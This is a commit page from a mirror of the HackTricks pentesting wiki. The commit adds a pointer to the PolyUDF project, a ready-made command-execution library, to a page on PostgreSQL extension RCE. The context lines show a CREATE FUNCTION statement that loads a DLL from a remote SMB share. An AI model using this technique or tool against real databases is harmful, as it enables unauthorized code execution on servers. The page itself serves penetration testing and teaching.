Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 04:33:28 +00:00
Code Issues Projects Releases Packages Wiki Activity

Merge pull request #887 from Lamisedaxeh/patch-1

Browse source 
Adding PolyUDF project to the postgresql rce page
This commit is contained in:
SirBroccoli 2024-07-17 19:54:16 +02:00 committed by GitHub
commit deda63acf1
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
1 changed files with 2 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
View file

@ -288,6 +288,8 @@ Note how in this case the **malicious code is inside the DllMain function**. Thi
CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS '\\10.10.10.10\shared\dummy_function.dll', 'dummy_function' LANGUAGE C STRICT;
```
The [PolyUDF project](https://github.com/rop-la/PolyUDF) is also a good starting point with the full MS Visual Studio project and a ready to use library (including: _command eval_, _exec_ and _cleanup_) with multiversion support.
### RCE in newest Prostgres versions
In the **latest versions** of PostgreSQL, restrictions have been imposed where the `superuser` is **prohibited** from **loading** shared library files except from specific directories, such as `C:\Program Files\PostgreSQL\11\lib` on Windows or `/var/lib/postgresql/11/lib` on \*nix systems. These directories are **secured** against write operations by either the NETWORK\_SERVICE or postgres accounts.